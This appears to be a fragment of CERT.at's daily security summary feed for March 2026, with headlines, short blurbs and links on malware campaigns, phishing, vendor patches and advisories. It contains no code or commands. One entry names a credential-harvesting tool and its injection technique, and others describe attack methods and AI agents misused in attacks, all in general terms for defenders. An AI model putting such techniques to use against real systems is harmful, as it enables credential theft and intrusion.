&lt;A HREF=&quot;https://hackread.com/blacksanta-malware-hr-staff-fake-cv-downloads/&quot;&gt;https://hackread.com/blacksanta-malware-hr-staff-fake-cv-downloads/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;RondoDox Botnet: From Zero to 174 Exploited Vulnerabilities&lt;/h3&gt;

A deep dive into the RondoDox botnet, examining its infrastructure, exploit adoption timeline, and methods used to target internet-exposed systems.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bitsight.com/blog/rondodox-botnet-infrastructure-analysis&quot;&gt;https://www.bitsight.com/blog/rondodox-botnet-infrastructure-analysis&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft releases Windows 10 KB5078885 extended security update&lt;/h3&gt;

Microsoft has released the Windows 10 KB5078885 extended security update to fix the March 2026 Patch Tuesday vulnerabilities, including 2 zero-days and an issue that prevents some devices from shutting down.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-windows-10-kb5078885-extended-security-update/&quot;&gt;https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-windows-10-kb5078885-extended-security-update/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Microsoft Patch Tuesday for March 2026 - Snort rules and prominent vulnerabilities&lt;/h3&gt;

Microsoft has released its monthly security update for March 2026, which includes 79 vulnerabilities, three of which Microsoft marked as &quot;critical.&quot;
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.talosintelligence.com/microsoft-patch-tuesday-march-2026/&quot;&gt;https://blog.talosintelligence.com/microsoft-patch-tuesday-march-2026/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;HPE warns of critical AOS-CX flaw allowing admin password resets&lt;/h3&gt;

Hewlett Packard Enterprise (HPE) has patched multiple security vulnerabilities in the Aruba Networking AOS-CX operating system, including several authentication and code execution issues. [..] The most severe security flaw today is a critical authentication bypass vulnerability (tracked as CVE-2026-23813) that attackers without privileges can exploit in low-complexity attacks to reset admin passwords.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/hpe-warns-of-critical-aos-cx-flaw-allowing-admin-password-resets/&quot;&gt;https://www.bleepingcomputer.com/news/security/hpe-warns-of-critical-aos-cx-flaw-allowing-admin-password-resets/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Adobe patch day: code execution possible in Reader, Illustrator and others&lt;/h3&gt;

Adobe's patch day overview lists the eight security bulletins for the individual products. In Adobe Commerce, Commerce B2B and Magento Open Source, the developers close 19 security vulnerabilities.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Adobe-Patchday-Schadcodeschmuggel-in-Reader-Illustrator-und-weiteren-moeglich-11206633.html&quot;&gt;https://www.heise.de/news/Adobe-Patchday-Schadcodeschmuggel-in-Reader-Illustrator-und-weiteren-moeglich-11206633.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Password manager KeePassXC 2.7.12: what users need to be aware of when updating&lt;/h3&gt;

The open-source password manager KeePassXC has been released in version 2.7.12. [..] As the developers state in their release blog, the new version contains mitigations against exploits via manipulated OpenSSL configuration files on Windows.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/KeePassXC-2-7-12-DLL-Schutz-Passkey-Aenderungen-und-TOTP-in-Auto-Type-11206934.html&quot;&gt;https://www.heise.de/news/KeePassXC-2-7-12-DLL-Schutz-Passkey-Aenderungen-und-TOTP-in-Auto-Type-11206934.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fortinet closes brute-force and command-injection flaws in FortiWeb and others&lt;/h3&gt;

Fortinet closes vulnerabilities in FortiWeb and FortiManager that, among other things, allow command injection. [..] Insufficient checking of the interaction frequency allows unauthenticated attackers to bypass FortiWeb's authentication rate limit with crafted requests (CVE-2026-24017, CVSS 7.3, risk &quot;high&quot;).
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Fortinet-schliesst-Brute-Force-und-Befehlsschmuggel-Luecken-in-FortiWeb-Co-11207011.html&quot;&gt;https://www.heise.de/news/Fortinet-schliesst-Brute-Force-und-Befehlsschmuggel-Luecken-in-FortiWeb-Co-11207011.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Drupal: Unpublished Node Permissions - Critical - Access bypass - SA-CONTRIB-2026-029&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.drupal.org/sa-contrib-2026-029&quot;&gt;https://www.drupal.org/sa-contrib-2026-029&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Drupal: AI (Artificial Intelligence) - Moderately critical - Information Disclosure - SA-CONTRIB-2026-028&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.drupal.org/sa-contrib-2026-028&quot;&gt;https://www.drupal.org/sa-contrib-2026-028&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cisco: Cisco IOS XR Egress Packet Network Interface Aligner Interrupt Denial of Service Vulnerability&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-xrncs-epni-int-dos-TWMffUsN&quot;&gt;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-xrncs-epni-int-dos-TWMffUsN&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cisco: Cisco Multiple Cisco Contact Center Products Cross-Site Scripting Vulnerabilities&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-xss-MrNAH5Jh&quot;&gt;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-xss-MrNAH5Jh&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cisco: Cisco IOS XR Software CLI Privilege Escalation Vulnerabilities&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-privesc-bF8D5U4W&quot;&gt;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-privesc-bF8D5U4W&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cisco: Cisco IOS XR Software Multi-Instance Intermediate System-to-Intermediate System Denial of Service Vulnerability&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-isis-dos-kDMxpSzK&quot;&gt;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-isis-dos-kDMxpSzK&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Splunk: Security Advisories 2026-03-11&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://advisory.splunk.com//advisories&quot;&gt;https://advisory.splunk.com//advisories&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;WordPress 6.9.4 Release&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://wordpress.org/news/2026/03/wordpress-6-9-4-release/&quot;&gt;https://wordpress.org/news/2026/03/wordpress-6-9-4-release/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN: Security updates for Wednesday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1062403/&quot;&gt;https://lwn.net/Articles/1062403/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Paloalto: CVE-2026-0230 Cortex XDR Agent: Local Administrator can disable the agent on macOS (Severity: MEDIUM)&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://security.paloaltonetworks.com/CVE-2026-0230&quot;&gt;https://security.paloaltonetworks.com/CVE-2026-0230&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Paloalto: CVE-2026-0231 Cortex XDR Broker VM: Sensitive Information Disclosure Vulnerability (Severity: MEDIUM)&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://security.paloaltonetworks.com/CVE-2026-0231&quot;&gt;https://security.paloaltonetworks.com/CVE-2026-0231&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-03-11T18:36:41Z</dc:date></entry><entry><title>Daily summary - 10.03.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/3/tagesberichte-10032026"/><author><name>CERT.at</name></author><updated>2026-03-10T18:17:32Z</updated><published>2026-03-10T18:17:32Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Monday 09-03-2026 18:00 - Tuesday 10-03-2026 18:00
Handler:     Guenes Holler
Co-Handler:  Michael Schlagenhaufer


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Lock the Ghost&lt;/h3&gt;

In the software world, &quot;remove&quot; is not equal to &quot;gone.&quot; This is crystal clear. There is always a good reason for that, but even the best reason does not have to be intuitive or expected by the users. Let's take a short trip through how the Python Package Index handles removals and how we can lock the ghost in an uv.lock file - forever!
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/en/blog/2026/3/lock-the-ghost&quot;&gt;https://www.cert.at/en/blog/2026/3/lock-the-ghost&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft Teams phishing targets employees with A0Backdoor malware&lt;/h3&gt;

Hackers contacted employees at financial and healthcare organizations over Microsoft Teams to trick them into granting remote access through Quick Assist and deploy a new piece of malware called A0Backdoor.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-targets-employees-with-backdoors/&quot;&gt;https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-targets-employees-with-backdoors/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;APT28 hackers deploy customized variant of Covenant open-source tool&lt;/h3&gt;

The Russian state-sponsored APT28 threat group is using a custom variant of the open-source Covenant post-exploitation framework for long-term espionage operations.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/apt28-hackers-deploy-customized-variant-of-covenant-open-source-tool/&quot;&gt;https://www.bleepingcomputer.com/news/security/apt28-hackers-deploy-customized-variant-of-covenant-open-source-tool/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft to enable Windows hotpatch security updates by default&lt;/h3&gt;

Microsoft will turn on hotpatch security updates by default for all eligible Windows devices managed through Microsoft Intune and the Microsoft Graph API, beginning with the May 2026 Windows security update.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/microsoft/microsoft-to-enable-hotpatch-security-updates-by-default-in-may/&quot;&gt;https://www.bleepingcomputer.com/news/microsoft/microsoft-to-enable-hotpatch-security-updates-by-default-in-may/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malicious npm Package Posing as OpenClaw Installer Deploys RAT, Steals macOS Credentials&lt;/h3&gt;

Cybersecurity researchers have discovered a malicious npm package that masquerades as an OpenClaw installer to deploy a remote access trojan (RAT) and steal sensitive data from compromised hosts.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/03/malicious-npm-package-posing-as.html&quot;&gt;https://thehackernews.com/2026/03/malicious-npm-package-posing-as.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet&lt;/h3&gt;

Cybersecurity researchers have discovered a new malware called KadNap that's primarily targeting Asus routers to enlist them into a botnet for proxying malicious traffic.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/03/kadnap-malware-infects-14000-edge.html&quot;&gt;https://thehackernews.com/2026/03/kadnap-malware-infects-14000-edge.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Bawag phishing: debit card, PIN code and online banking credentials at risk!&lt;/h3&gt;

A well-known phishing scam is currently being observed particularly frequently again. The perpetrators send fake e-mails in the name of Bawag warning that the recipient's debit card is about to expire. Under the pretext of ordering a new card, they ask for highly sensitive data. In addition, victims are instructed to send their old card by post to an address in Vienna.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/bawag-phishing-debitkarte/&quot;&gt;https://www.watchlist-internet.at/news/bawag-phishing-debitkarte/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Iranian MOIS Actors &amp; the Cyber Crime Connection&lt;/h3&gt;

Iran-linked actors are increasingly engaging with the cyber crime ecosystem. Their activity suggests a growing reliance on criminal tools, services, and operational models in support of state objectives. Iranian actors have long used cyber crime and hacktivism as cover for destructive activity, but the trend now suggests direct engagement with the criminal ecosystem.
&lt;p /&gt;
&lt;A HREF=&quot;https://research.checkpoint.com/2026/iranian-mois-actors-the-cyber-crime-connection/&quot;&gt;https://research.checkpoint.com/2026/iranian-mois-actors-the-cyber-crime-connection/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;OpenClaw Advisory Surge Highlights Gaps Between GHSA and CVE Tracking&lt;/h3&gt;

A recent burst of security disclosures in the OpenClaw project is drawing attention to how vulnerability information flows across advisory and CVE systems.
&lt;p /&gt;
&lt;A HREF=&quot;https://socket.dev/blog/openclaw-advisory-surge-highlights-gaps-between-ghsa-and-cve-tracking?utm_medium=feed&quot;&gt;https://socket.dev/blog/openclaw-advisory-surge-highlights-gaps-between-ghsa-and-cve-tracking?utm_medium=feed&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cyberattack Forces Polish Hospital to Revert to Paper-Based Operations&lt;/h3&gt;

The Independent Public Regional Hospital in the western Polish city of Szczecin has been compelled to switch back to a paper-based workflow after suffering a cyberattack over the weekend. Hospital authorities confirmed that the incident, which struck the facility's IT system on the night of March 7-8, 2026, has temporarily disrupted digital operations, though patients' health remains uncompromised.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/szczecin-public-regional-hospital-cyberattack/&quot;&gt;https://thecyberexpress.com/szczecin-public-regional-hospital-cyberattack/&lt;/a&gt;

&lt;hr&gt;

&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;SAP Patch Day: NetWeaver vulnerability allows malicious code injection&lt;/h3&gt;

In March, SAP addresses vulnerabilities in various products, some of them critical, in 15 security notes. Admins need to act.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11205008&quot;&gt;https://heise.de/-11205008&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;30,000 WordPress Sites Affected by Authentication Bypass Vulnerability in Tutor LMS Pro WordPress Plugin&lt;/h3&gt;

On December 30th, 2025, we received a submission for an Authentication Bypass vulnerability in Tutor LMS Pro, a WordPress plugin estimated to have more than 30,000 active installations. The vulnerability makes it possible for an unauthenticated attacker to gain access to any account on a site including accounts used to administer the site, if the attacker knows, or can find, the associated email address.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.wordfence.com/blog/2026/03/30000-wordpress-sites-affected-by-authentication-bypass-vulnerability-in-tutor-lms-pro-wordpress-plugin/&quot;&gt;https://www.wordfence.com/blog/2026/03/30000-wordpress-sites-affected-by-authentication-bypass-vulnerability-in-tutor-lms-pro-wordpress-plugin/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Tuesday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1062260/&quot;&gt;https://lwn.net/Articles/1062260/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CISA Adds Three Known Exploited Vulnerabilities to Catalog&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog&quot;&gt;https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Ivanti March 2026 Security Update&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.ivanti.com/blog/march-2026-security-update&quot;&gt;https://www.ivanti.com/blog/march-2026-security-update&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-03-10T18:17:32Z</dc:date></entry><entry><title>Tageszusammenfassung - 09.03.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/3/tagesberichte-09032026"/><author><name>CERT.at</name></author><updated>2026-03-09T19:03:39Z</updated><published>2026-03-09T19:03:39Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Friday 06-03-2026 18:00 - Monday 09-03-2026 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Felician Fuchs


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Microsoft: Hackers abusing AI at every stage of cyberattacks&lt;/h3&gt;

Microsoft says threat actors are increasingly using artificial intelligence in their operations to accelerate attacks, scale malicious activity, and lower technical barriers across all aspects of a cyberattack.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Termite ransomware breaches linked to ClickFix CastleRAT attacks&lt;/h3&gt;

Ransomware threat actors tracked as Velvet Tempest are using the ClickFix technique and legitimate Windows utilities to deploy the DonutLoader malware and the CastleRAT backdoor.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;VU#976247: Antivirus and Endpoint Detection and Response Archive Scanning Engines may not properly scan malformed zip archives&lt;/h3&gt;

Malformed ZIP headers can cause antivirus and endpoint detection and response software (EDR) to produce false negatives. Despite the presence of malformed headers, some extraction software is still able to decompress the ZIP archive, allowing potentially malicious payloads to run upon file decompression.
&lt;p /&gt;
&lt;A HREF=&quot;https://kb.cert.org/vuls/id/976247&quot;&gt;https://kb.cert.org/vuls/id/976247&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Anthropic Finds 22 Firefox Vulnerabilities Using Claude Opus 4.6 AI Model&lt;/h3&gt;

Anthropic on Friday said it discovered 22 new security vulnerabilities in the Firefox web browser as part of a security partnership with Mozilla. Of these, 14 have been classified as high, seven have been classified as moderate, and one has been rated low in severity.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/03/anthropic-finds-22-firefox.html&quot;&gt;https://thehackernews.com/2026/03/anthropic-finds-22-firefox.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Chrome Extension Turns Malicious After Ownership Transfer, Enabling Code Injection and Data Theft&lt;/h3&gt;

Two Google Chrome extensions have turned malicious after what appears to be a case of ownership transfer, offering attackers a way to push malware to downstream customers, inject arbitrary code, and harvest sensitive data.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/03/chrome-extension-turns-malicious-after.html&quot;&gt;https://thehackernews.com/2026/03/chrome-extension-turns-malicious-after.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;UNC4899 Breached Crypto Firm After Developer AirDropped Trojanized File to Work Device&lt;/h3&gt;

The North Korean threat actor known as UNC4899 is suspected to be behind a sophisticated cloud compromise campaign targeting a cryptocurrency organization in 2025 to steal millions of dollars in cryptocurrency.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/03/unc4899-used-airdrop-file-transfer-and.html&quot;&gt;https://thehackernews.com/2026/03/unc4899-used-airdrop-file-transfer-and.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Spyware disguised as emergency-alert app sent to Israeli smartphones&lt;/h3&gt;

Steals SMS messages, location data, contacts and delivers it to Hamas-linked crew. Hamas-linked attackers are dropping spyware disguised as an emergency-alert app on Israelis' smartphones via SMS messages, according to security researchers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/03/06/spyware_disguised_as_emergency_alert/&quot;&gt;https://www.theregister.com/2026/03/06/spyware_disguised_as_emergency_alert/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Russian cybercrims phish their way into officials' Signal and WhatsApp accounts&lt;/h3&gt;

Dutch spies flag large-scale campaign to hijack secure messaging accounts. Russian-linked hackers are trying to break into the Signal and WhatsApp accounts of government officials, journalists, and military personnel globally - not by cracking encryption, but by simply tricking people into handing over the keys.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/03/09/dutch_spies_say_russian_cybercrims/&quot;&gt;https://www.theregister.com/2026/03/09/dutch_spies_say_russian_cybercrims/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Middle East Conflict Fuels Opportunistic Cyber Attacks&lt;/h3&gt;

Threat actors often take advantage of major global events to fuel interest in their malicious activities. Zscaler ThreatLabz is diligently tracking a surge in cybercriminal activity that capitalizes on the elevated political climate in the Middle East. This increased malicious activity includes discoveries that are directly tied to the ongoing conflict, alongside other related findings.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.zscaler.com/blogs/security-research/middle-east-conflict-fuels-opportunistic-cyber-attacks&quot;&gt;https://www.zscaler.com/blogs/security-research/middle-east-conflict-fuels-opportunistic-cyber-attacks&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;NIS2: Why so few companies are registering&lt;/h3&gt;

The NIS2 registration deadline has passed, but many companies have not yet registered. This is why implementation of the security directive is stalling.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Douglas-Adams-wuerde-NIS2-lieben-11204285.html&quot;&gt;https://www.heise.de/news/Douglas-Adams-wuerde-NIS2-lieben-11204285.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;DumpBrowserSecrets - Browser Credential Harvesting with App-Bound Encryption Bypass&lt;/h3&gt;

DumpBrowserSecrets extracts saved passwords, cookies, OAuth tokens and autofill data from Chrome, Edge, Firefox, Opera and Vivaldi, bypassing App-Bound Encryption via Early Bird APC injection.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.darknet.org.uk/2026/03/dumpbrowsersecrets-browser-credential-harvesting-with-app-bound-encryption-bypass/&quot;&gt;https://www.darknet.org.uk/2026/03/dumpbrowsersecrets-browser-credential-harvesting-with-app-bound-encryption-bypass/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LTR101 - Getting into Industry in 2026&lt;/h3&gt;

Breaking into cybersecurity in 2026: SOC roles, blue team skills, labs, certifications, and practical advice to help you land your first job.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.zsec.uk/ltr101-getting-into-industry-in-2026/&quot;&gt;https://blog.zsec.uk/ltr101-getting-into-industry-in-2026/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;AI Bot Hackerbot-Claw Targets Microsoft, DataDog and CNCF GitHub Repos&lt;/h3&gt;

Security firm Pillar reveals the Chaos Agent in which Hackerbot-Claw, an AI agent, used natural language to compromise major GitHub projects and hijack developer tools.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/ai-bot-hackerbot-claw-microsoft-datadog-github-repos/&quot;&gt;https://hackread.com/ai-bot-hackerbot-claw-microsoft-datadog-github-repos/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Behind the console: Active phishing campaign targeting AWS console credentials&lt;/h3&gt;

Datadog Security Research identified an active adversary-in-the-middle (AiTM) phishing campaign targeting AWS Console credentials via typosquatted domains that mimic AWS infrastructure.
&lt;p /&gt;
&lt;A HREF=&quot;https://securitylabs.datadoghq.com/articles/behind-the-console-aws-aitm-phishing-campaign/&quot;&gt;https://securitylabs.datadoghq.com/articles/behind-the-console-aws-aitm-phishing-campaign/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The first AI agent worm is months away, if that&lt;/h3&gt;

I'm convinced that the first AI worm/virus is months away, if that. We've seen the first major evidence of &quot;claw&quot; style agents, which have only been around very briefly, acting in highly malicious ways.
&lt;p /&gt;
&lt;A HREF=&quot;https://dustycloud.org/blog/the-first-ai-agent-worm-is-months-away-if-that/&quot;&gt;https://dustycloud.org/blog/the-first-ai-agent-worm-is-months-away-if-that/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ClipXDaemon Malware, a Stealthy Cryptocurrency Clipboard Hijacker on Linux&lt;/h3&gt;

Security researchers have identified a new Linux malware strain called ClipXDaemon, a stealthy threat designed to target cryptocurrency users by manipulating copied wallet addresses. Cyble's Research &amp; Intelligence Labs (CRIL) found the malware delivered through a loader structure previously associated with ShadowHS activity.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/clipxdaemon-linux-malware/&quot;&gt;https://thecyberexpress.com/clipxdaemon-linux-malware/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Nextcloud: code injection possible via vulnerability in Flow&lt;/h3&gt;

In Nextcloud Flow, attackers can abuse a vulnerability to compromise the instance. An update is available.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11203404&quot;&gt;https://heise.de/-11203404&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Critical Nginx UI Vulnerability Exposes Server Backups and Sensitive Data&lt;/h3&gt;

A newly disclosed vulnerability in Nginx UI, tracked as CVE-2026-27944, has raised major security concerns after researchers confirmed that attackers can download and decrypt server backups without authentication. The flaw, which carries a CVSS score of 9.8, represents a critical security risk for organizations that expose their Nginx UI management interface to the public internet.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/cve-2026-27944-nginx-ui-backup-vulnerability/&quot;&gt;https://thecyberexpress.com/cve-2026-27944-nginx-ui-backup-vulnerability/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Monday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1062103/&quot;&gt;https://lwn.net/Articles/1062103/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-03-09T19:03:39Z</dc:date></entry><entry><title>Tageszusammenfassung - 06.03.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/3/tagesberichte-06032026"/><author><name>CERT.at</name></author><updated>2026-03-06T18:36:46Z</updated><published>2026-03-06T18:36:46Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Thursday 05-03-2026 18:00 - Friday 06-03-2026 18:00
Handler:     Felician Fuchs
Co-Handler:  Michael Schlagenhaufer


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Wikipedia hit by self-propagating JavaScript worm that vandalized pages&lt;/h3&gt;

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/wikipedia-hit-by-self-propagating-javascript-worm-that-vandalized-pages/&quot;&gt;https://www.bleepingcomputer.com/news/security/wikipedia-hit-by-self-propagating-javascript-worm-that-vandalized-pages/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fake Claude Code install guides push infostealers in InstallFix attacks&lt;/h3&gt;

Threat actors are employing a new variation of the ClickFix social engineering technique called InstallFix to trick users into running malicious commands under the pretext of installing legitimate command line interface (CLI) tools.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/fake-claude-code-install-guides-push-infostealers-in-installfix-attacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/fake-claude-code-install-guides-push-infostealers-in-installfix-attacks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cyberattack: the FBI apparently has hackers in its network&lt;/h3&gt;

A system used by the FBI to manage surveillance measures has apparently been compromised. The agency is investigating suspicious activity.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/cyberangriff-das-fbi-hat-offenbar-hacker-im-netzwerk-2603-206170.html&quot;&gt;https://www.golem.de/news/cyberangriff-das-fbi-hat-offenbar-hacker-im-netzwerk-2603-206170.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Data protection: FBI obtains payment data from Protonmail&lt;/h3&gt;

Through mutual legal assistance agreements, personal data can reach law enforcement authorities in the USA even from Switzerland.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/datenschutz-fbi-gelangt-an-zahlungsdaten-von-protonmail-2603-206199.html&quot;&gt;https://www.golem.de/news/datenschutz-fbi-gelangt-an-zahlungsdaten-von-protonmail-2603-206199.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer&lt;/h3&gt;

Microsoft on Thursday disclosed details of a new widespread ClickFix social engineering campaign that has leveraged the Windows Terminal app as a way to activate a sophisticated attack chain and deploy the Lumma Stealer malware.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html&quot;&gt;https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Multi-Stage VOID#GEIST Malware Delivering XWorm, AsyncRAT, and Xeno RAT&lt;/h3&gt;

Cybersecurity researchers have disclosed details of a multi-stage malware campaign that uses batch scripts as a pathway to deliver various encrypted remote access trojan (RAT) payloads that correspond to XWorm, AsyncRAT, and Xeno RAT.
&lt;p /&gt;
